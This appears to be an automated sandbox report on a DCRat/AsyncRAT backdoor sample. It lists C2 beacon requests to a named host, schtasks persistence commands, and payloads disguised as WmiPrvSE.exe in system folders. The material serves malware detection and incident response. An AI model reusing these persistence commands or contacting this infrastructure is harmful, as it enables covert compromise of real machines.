                                               Nov 5, 2023 14:28:23.507003069 CET | 49736 | 80 | 192.168.2.4 | 185.26.122.79
                                               Nov 5, 2023 14:28:23.713529110 CET | 80 | 49736 | 185.26.122.79 | 192.168.2.4
                                               Nov 5, 2023 14:28:23.713598967 CET | 80 | 49736 | 185.26.122.79 | 192.168.2.4
                                               Nov 5, 2023 14:28:23.718405008 CET | 49736 | 80 | 192.168.2.4 | 185.26.122.79
                                               Nov 5, 2023 14:28:23.930250883 CET | 80 | 49736 | 185.26.122.79 | 192.168.2.4
                                               Nov 5, 2023 14:28:23.932092905 CET | 49736 | 80 | 192.168.2.4 | 185.26.122.79
                                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                               Nov 5, 2023 14:27:05.691212893 CET | 56799 | 53 | 192.168.2.4 | 1.1.1.1
                                               Nov 5, 2023 14:27:06.241409063 CET | 53 | 56799 | 1.1.1.1 | 192.168.2.4
                                               Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                               Nov 5, 2023 14:27:05.691212893 CET | 192.168.2.4 | 1.1.1.1 | 0xf82 | Standard query (0) | host1835875.hostland.pro | A (IP address) | IN (0x0001) | false
                                               Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                               Nov 5, 2023 14:27:06.241409063 CET | 1.1.1.1 | 192.168.2.4 | 0xf82 | No error (0) | host1835875.hostland.pro | | 185.26.122.79 | A (IP address) | IN (0x0001) | false
                                              • host1835875.hostland.pro
                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                               0 | 192.168.2.4 | 49729 | 185.26.122.79 | 80 | C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe
                                               Timestamp | kBytes transferred | Direction | Data
                                               Nov 5, 2023 14:27:06.457415104 CET | 1 | OUT | GET /Lowlongpolltest.php?fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s&3998e4b767cc58057b788963dc557b0a=79a349ba785d906a76eb09f6c1191279&a186b4e8b8ab60f6ea84885b889965cc=QMzcTNzIWZ1UjM5Y2MhlzMmNTNxQ2YkF2M4cTZwgTMwMjNjFzNxkzM&fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/html
                                              User-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3
                                              Host: host1835875.hostland.pro
                                              Connection: Keep-Alive
                                              Nov 5, 2023 14:27:06.664421082 CET | 1 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sun, 05 Nov 2023 13:27:06 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: keep-alive
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                              Nov 5, 2023 14:27:06.686235905 CET | 2 | OUT | GET /Lowlongpolltest.php?fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s&3998e4b767cc58057b788963dc557b0a=79a349ba785d906a76eb09f6c1191279&a186b4e8b8ab60f6ea84885b889965cc=QMzcTNzIWZ1UjM5Y2MhlzMmNTNxQ2YkF2M4cTZwgTMwMjNjFzNxkzM&fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/html
                                              User-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3
                                              Host: host1835875.hostland.pro
                                              Nov 5, 2023 14:27:06.893672943 CET | 3 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sun, 05 Nov 2023 13:27:06 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: keep-alive
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              1 | 192.168.2.4 | 49736 | 185.26.122.79 | 80 | C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Nov 5, 2023 14:28:23.507003069 CET | 212 | OUT | GET /Lowlongpolltest.php?vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf54Zhii&lN2OD2zm5Q9N95QIwn65xDDbUNxJIVc=Lcgz7hIfUeMLBOgjpwm4mnLiJb4z&3998e4b767cc58057b788963dc557b0a=79a349ba785d906a76eb09f6c1191279&a186b4e8b8ab60f6ea84885b889965cc=QMzcTNzIWZ1UjM5Y2MhlzMmNTNxQ2YkF2M4cTZwgTMwMjNjFzNxkzM&vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf54Zhii&lN2OD2zm5Q9N95QIwn65xDDbUNxJIVc=Lcgz7hIfUeMLBOgjpwm4mnLiJb4z HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/javascript
                                              User-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)
                                              Host: host1835875.hostland.pro
                                              Connection: Keep-Alive
                                              Nov 5, 2023 14:28:23.713598967 CET | 212 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sun, 05 Nov 2023 13:28:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 146
                                              Connection: keep-alive
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                              Nov 5, 2023 14:28:23.718405008 CET | 213 | OUT | GET /Lowlongpolltest.php?vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf54Zhii&lN2OD2zm5Q9N95QIwn65xDDbUNxJIVc=Lcgz7hIfUeMLBOgjpwm4mnLiJb4z&3998e4b767cc58057b788963dc557b0a=79a349ba785d906a76eb09f6c1191279&a186b4e8b8ab60f6ea84885b889965cc=QMzcTNzIWZ1UjM5Y2MhlzMmNTNxQ2YkF2M4cTZwgTMwMjNjFzNxkzM&vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf54Zhii&lN2OD2zm5Q9N95QIwn65xDDbUNxJIVc=Lcgz7hIfUeMLBOgjpwm4mnLiJb4z HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/javascript
                                              User-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)
                                              Host: host1835875.hostland.pro
                                              Nov 5, 2023 14:28:23.930250883 CET | 213 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sun, 05 Nov 2023 13:28:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 146
                                              Connection: keep-alive
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Target ID:0
                                              Start time:14:26:52
                                              Start date:05/11/2023
                                              Path:C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
                                              Imagebase:0x7d0000
                                              File size:1'378'916 bytes
                                              MD5 hash:5D329190630C5C051E1B2C4AD4C69ABD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:1
                                              Start time:14:26:53
                                              Start date:05/11/2023
                                              Path:C:\Windows\SysWOW64\wscript.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Adobe\sN8j8UtUmLUEbzv.vbe"
                                              Imagebase:0xd60000
                                              File size:147'456 bytes
                                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:2
                                              Start time:14:27:00
                                              Start date:05/11/2023
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Adobe\87tDm8T1lOvAjdSEmWMIMA3JTpcTMB.bat" "
                                              Imagebase:0x240000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
                                              Start time:14:27:00
                                              Start date:05/11/2023
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:14:27:00
                                              Start date:05/11/2023
                                              Path:C:\Users\user\AppData\Roaming\Adobe\hui.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\AppData\Roaming\Adobe\hui.exe
                                              Imagebase:0x1b0000
                                              File size:944'128 bytes
                                              MD5 hash:1B46DAD7064609344351AC9EFE3F9AAB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1741908323.0000000002521000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.1741908323.0000000002521000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1741908323.000000000258D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 88%, ReversingLabs
                                              • Detection: 61%, Virustotal, Browse
                                              Reputation:low
                                              Has exited:true

                                              Target ID:5
                                              Start time:14:27:03
                                              Start date:05/11/2023
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:schtasks.exe /create /tn "KQihinlofznONtA" /sc ONLOGON /tr "'C:\PerfLogs\KQihinlofznONtA.exe'" /rl HIGHEST /f
                                              Imagebase:0x7ff76f990000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:6
                                              Start time:14:27:03
                                              Start date:05/11/2023
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\PerfLogs\WmiPrvSE.exe'" /rl HIGHEST /f
                                              Imagebase:0x7ff76f990000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:7
                                              Start time:14:27:03
                                              Start date:05/11/2023
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe'" /rl HIGHEST /f
                                              Imagebase:0x7ff76f990000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:8
                                              Start time:14:27:03
                                              Start date:05/11/2023
                                              Path:C:\PerfLogs\KQihinlofznONtA.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\PerfLogs\KQihinlofznONtA.exe
                                              Imagebase:0x7ff7699e0000
                                              File size:944'128 bytes
                                              MD5 hash:1B46DAD7064609344351AC9EFE3F9AAB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.1816721235.0000000002AFB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.1816721235.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.1816721235.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\PerfLogs\KQihinlofznONtA.exe, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 88%, ReversingLabs
                                              • Detection: 61%, Virustotal, Browse
                                              Reputation:low
                                              Has exited:true

                                              Target ID:9
                                              Start time:14:27:03
                                              Start date:05/11/2023
                                              Path:C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe
                                              Imagebase:0x5f0000
                                              File size:944'128 bytes
                                              MD5 hash:1B46DAD7064609344351AC9EFE3F9AAB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.1760913066.000000000299D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.1760913066.0000000002931000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000009.00000002.1760913066.0000000002931000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                              Antivirus matches:
                                              • Detection: 88%, ReversingLabs
                                              • Detection: 61%, Virustotal, Browse
                                              Reputation:low
                                              Has exited:true

                                              Target ID:10
                                              Start time:14:27:03
                                              Start date:05/11/2023
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zoUR8TSZV2.bat"
                                              Imagebase:0x7ff7b7850000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:11
                                              Start time:14:27:03
                                              Start date:05/11/2023
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:12
                                              Start time:14:27:03
                                              Start date:05/11/2023
                                              Path:C:\Windows\System32\chcp.com
                                              Wow64 process (32bit):false
                                              Commandline:chcp 65001
                                              Imagebase:0x7ff663bb0000
                                              File size:14'848 bytes
                                              MD5 hash:33395C4732A49065EA72590B14B64F32
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:13
                                              Start time:14:27:03
                                              Start date:05/11/2023
                                              Path:C:\Windows\System32\w32tm.exe
                                              Wow64 process (32bit):false
                                              Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                              Imagebase:0x7ff6768b0000
                                              File size:108'032 bytes
                                              MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:14
                                              Start time:14:27:08
                                              Start date:05/11/2023
                                              Path:C:\Users\user\AppData\Roaming\Adobe\hui.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Roaming\Adobe\hui.exe"
                                              Imagebase:0x310000
                                              File size:944'128 bytes
                                              MD5 hash:1B46DAD7064609344351AC9EFE3F9AAB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:low
                                              Has exited:true

                                              Target ID:18
                                              Start time:14:28:18
                                              Start date:05/11/2023
                                              Path:C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe"
                                              Imagebase:0x860000
                                              File size:944'128 bytes
                                              MD5 hash:1B46DAD7064609344351AC9EFE3F9AAB
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:low
                                              Has exited:true


                                                Execution Graph

                                                Execution Coverage:10.1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:9%
                                                Total number of Nodes:1544
                                                Total number of Limit Nodes:38
                                                execution_graph: flattened text rendering of the interactive execution-graph view. Each entry is a node id, the code address of the function (image base 0x7d0000 range), and the Windows API calls resolved at that node (among them PeekMessageW, GetMessageW, DispatchMessageW, LoadStringW, WideCharToMultiByte, SetDlgItemTextW, ShellExecuteExW, CreateFileMappingW, MapViewOfFile, GetCommandLineW, GetModuleFileNameW, MoveFileW, MoveFileExW, DeleteFileW, SetFileAttributesW, CreateDirectoryW, ExpandEnvironmentStringsW, SetThreadExecutionState, GetVersionExW, GetProcessAffinityMask, LoadLibraryExA, GetProcAddress, VirtualProtect, IsDebuggerPresent, SetUnhandledExceptionFilter, RaiseException, Sleep, GetTickCount); edges between nodes are written as from->to. The node and edge listing itself is not reproduced here.
23890->23614 23892 7d5e4a 23891->23892 23936 7d5d67 23892->23936 23894 7d5e7d 23896 7d5eb5 23894->23896 23941 7dad65 CharUpperW CompareStringW 23894->23941 23896->23628 23898 7d8289 23897->23898 23947 7e179d CharUpperW 23898->23947 23900 7d8333 23900->23631 23902 7d7d7b 23901->23902 23903 7d7dbb 23902->23903 23948 7d7043 74 API calls 23902->23948 23903->23639 23905 7d7db3 23949 7d6dc1 74 API calls 23905->23949 23908 7d9d73 23907->23908 23911 7d9d82 23907->23911 23909 7d9d79 FlushFileBuffers 23908->23909 23908->23911 23909->23911 23910 7d9dfb SetFileTime 23910->23696 23911->23910 23912->23619 23913->23622 23914->23623 23915->23639 23916->23639 23917->23636 23918->23651 23919->23644 23920->23651 23922 7d998f 23921->23922 23923 7d9992 GetFileType 23921->23923 23922->23658 23924 7d99a0 23923->23924 23924->23658 23925->23661 23926->23663 23927->23664 23928->23687 23929->23687 23930->23687 23931->23687 23932->23687 23933->23692 23934->23690 23935->23699 23942 7d5c64 23936->23942 23938 7d5d88 23938->23894 23940 7d5c64 2 API calls 23940->23938 23941->23894 23943 7d5c6e 23942->23943 23945 7d5d56 23943->23945 23946 7dad65 CharUpperW CompareStringW 23943->23946 23945->23938 23945->23940 23946->23943 23947->23900 23948->23905 23949->23903 23951 7dc8db 23950->23951 23956 7da90e 23951->23956 23953 7dc90d 23954 7da90e 84 API calls 23953->23954 23955 7dc918 23954->23955 23957 7da945 23956->23957 23958 7da931 23956->23958 23957->23953 23961 7e075b 84 API calls 23958->23961 23960 7da938 23960->23957 23961->23960 23963 7da5fe 23962->23963 23964 7da691 FindNextFileW 23963->23964 23965 7da621 FindFirstFileW 23963->23965 23966 7da69c GetLastError 23964->23966 23967 7da6b0 23964->23967 23968 7da638 23965->23968 23973 7da675 23965->23973 23966->23967 23967->23973 23969 7db66c 2 API calls 23968->23969 23970 7da64d 23969->23970 23971 7da66a GetLastError 23970->23971 23972 7da651 FindFirstFileW 23970->23972 23971->23973 23972->23971 23972->23973 23973->23566 23983 7e9d39 GetDC GetDeviceCaps 
GetDeviceCaps ReleaseDC 23974->23983 23976 7e9d21 23977 7e9d2d 23976->23977 23984 7e9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23976->23984 23977->23312 23977->23313 23979->23314 23980->23322 23981->23322 23982->23325 23983->23976 23984->23977 23985->23333 23987 7d9ef7 76 API calls 23986->23987 23988 7d1f5b 23987->23988 23989 7d19a6 97 API calls 23988->23989 23992 7d1f78 23988->23992 23990 7d1f68 23989->23990 23990->23992 23993 7d6dc1 74 API calls 23990->23993 23992->23341 23992->23342 23993->23992 24879 7eb8e0 93 API calls _swprintf 24880 7e8ce0 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 24007 7d10d5 24012 7d5bd7 24007->24012 24013 7d5be1 __EH_prolog 24012->24013 24014 7db07d 82 API calls 24013->24014 24015 7d5bed 24014->24015 24021 7d5dcc GetCurrentProcess GetProcessAffinityMask 24015->24021 24030 7eead2 24031 7eeade ___DestructExceptionObject 24030->24031 24056 7ee5c7 24031->24056 24033 7eeae5 24035 7eeb0e 24033->24035 24136 7eef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 24033->24136 24041 7eeb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24035->24041 24067 7f824d 24035->24067 24039 7eeb2d ___DestructExceptionObject 24047 7eebad 24041->24047 24137 7f7243 38 API calls 3 library calls 24041->24137 24075 7ef020 24047->24075 24051 7eebd9 24053 7eebe2 24051->24053 24138 7f764a 28 API calls _abort 24051->24138 24139 7ee73e 13 API calls 2 library calls 24053->24139 24057 7ee5d0 24056->24057 24140 7eed5b IsProcessorFeaturePresent 24057->24140 24059 7ee5dc 24141 7f2016 24059->24141 24061 7ee5e1 24062 7ee5e5 24061->24062 24150 7f80d7 24061->24150 24062->24033 24065 7ee5fc 24065->24033 24070 7f8264 24067->24070 24068 7eec4a DloadUnlock 5 API calls 24069 7eeb27 24068->24069 24069->24039 24071 7f81f1 24069->24071 24070->24068 24074 7f8220 24071->24074 24072 7eec4a DloadUnlock 5 API calls 24073 7f8249 24072->24073 24073->24041 24074->24072 
24200 7ef350 24075->24200 24078 7eebb3 24079 7f819e 24078->24079 24202 7fb290 24079->24202 24081 7f81a7 24082 7eebbc 24081->24082 24206 7fb59a 38 API calls 24081->24206 24084 7ed5d4 24082->24084 24341 7e00cf 24084->24341 24088 7ed5f3 24390 7ea335 24088->24390 24090 7ed5fc 24394 7e13b3 GetCPInfo 24090->24394 24092 7ed606 ___scrt_fastfail 24093 7ed619 GetCommandLineW 24092->24093 24094 7ed628 24093->24094 24095 7ed6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24093->24095 24397 7ebc84 24094->24397 24097 7d400a _swprintf 51 API calls 24095->24097 24098 7ed70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24097->24098 24408 7eaded LoadBitmapW 24098->24408 24101 7ed636 OpenFileMappingW 24104 7ed64f MapViewOfFile 24101->24104 24105 7ed696 CloseHandle 24101->24105 24102 7ed6a0 24402 7ed287 24102->24402 24108 7ed68d UnmapViewOfFile 24104->24108 24109 7ed660 __vswprintf_c_l 24104->24109 24105->24095 24108->24105 24113 7ed287 2 API calls 24109->24113 24115 7ed67c 24113->24115 24114 7e8835 8 API calls 24116 7ed76a DialogBoxParamW 24114->24116 24115->24108 24117 7ed7a4 24116->24117 24118 7ed7bd 24117->24118 24119 7ed7b6 Sleep 24117->24119 24120 7ed7cb 24118->24120 24438 7ea544 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 24118->24438 24119->24118 24122 7ed7ea DeleteObject 24120->24122 24123 7ed7ff DeleteObject 24122->24123 24124 7ed806 24122->24124 24123->24124 24125 7ed849 24124->24125 24126 7ed837 24124->24126 24435 7ea39d 24125->24435 24439 7ed2e6 6 API calls 24126->24439 24128 7ed83d CloseHandle 24128->24125 24130 7ed883 24131 7f757e GetModuleHandleW 24130->24131 24132 7eebcf 24131->24132 24132->24051 24133 7f76a7 24132->24133 24573 7f7424 24133->24573 24136->24033 24137->24047 24138->24053 24139->24039 24140->24059 24142 7f201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 24141->24142 24154 7f310e 24142->24154 24146 7f2031 24147 7f203c 24146->24147 24168 7f314a DeleteCriticalSection 24146->24168 24147->24061 
24149 7f2029 24149->24061 24196 7fb73a 24150->24196 24153 7f203f 8 API calls 3 library calls 24153->24062 24156 7f3117 24154->24156 24157 7f3140 24156->24157 24158 7f2025 24156->24158 24169 7f3385 24156->24169 24174 7f314a DeleteCriticalSection 24157->24174 24158->24149 24160 7f215c 24158->24160 24189 7f329a 24160->24189 24162 7f2166 24167 7f2171 24162->24167 24194 7f3348 6 API calls try_get_function 24162->24194 24164 7f217f 24165 7f218c 24164->24165 24195 7f218f 6 API calls ___vcrt_FlsFree 24164->24195 24165->24146 24167->24146 24168->24149 24175 7f3179 24169->24175 24172 7f33bc InitializeCriticalSectionAndSpinCount 24173 7f33a8 24172->24173 24173->24156 24174->24158 24176 7f31a9 24175->24176 24177 7f31ad 24175->24177 24176->24177 24180 7f31cd 24176->24180 24182 7f3219 24176->24182 24177->24172 24177->24173 24179 7f31d9 GetProcAddress 24181 7f31e9 __crt_fast_encode_pointer 24179->24181 24180->24177 24180->24179 24181->24177 24183 7f3241 LoadLibraryExW 24182->24183 24187 7f3236 24182->24187 24184 7f325d GetLastError 24183->24184 24185 7f3275 24183->24185 24184->24185 24188 7f3268 LoadLibraryExW 24184->24188 24186 7f328c FreeLibrary 24185->24186 24185->24187 24186->24187 24187->24176 24188->24185 24190 7f3179 try_get_function 5 API calls 24189->24190 24191 7f32b4 24190->24191 24192 7f32cc TlsAlloc 24191->24192 24193 7f32bd 24191->24193 24193->24162 24194->24164 24195->24167 24197 7fb753 24196->24197 24198 7eec4a DloadUnlock 5 API calls 24197->24198 24199 7ee5ee 24198->24199 24199->24065 24199->24153 24201 7ef033 GetStartupInfoW 24200->24201 24201->24078 24203 7fb2a2 24202->24203 24204 7fb299 24202->24204 24203->24081 24207 7fb188 24204->24207 24206->24081 24208 7f8fa5 FindHandlerForForeignException 38 API calls 24207->24208 24209 7fb195 24208->24209 24227 7fb2ae 24209->24227 24211 7fb19d 24236 7faf1b 24211->24236 24214 7fb1b4 24214->24203 24215 7f8518 __onexit 21 API calls 24216 7fb1c5 24215->24216 24217 7fb1f7 24216->24217 24243 7fb350 24216->24243 24219 7f84de 
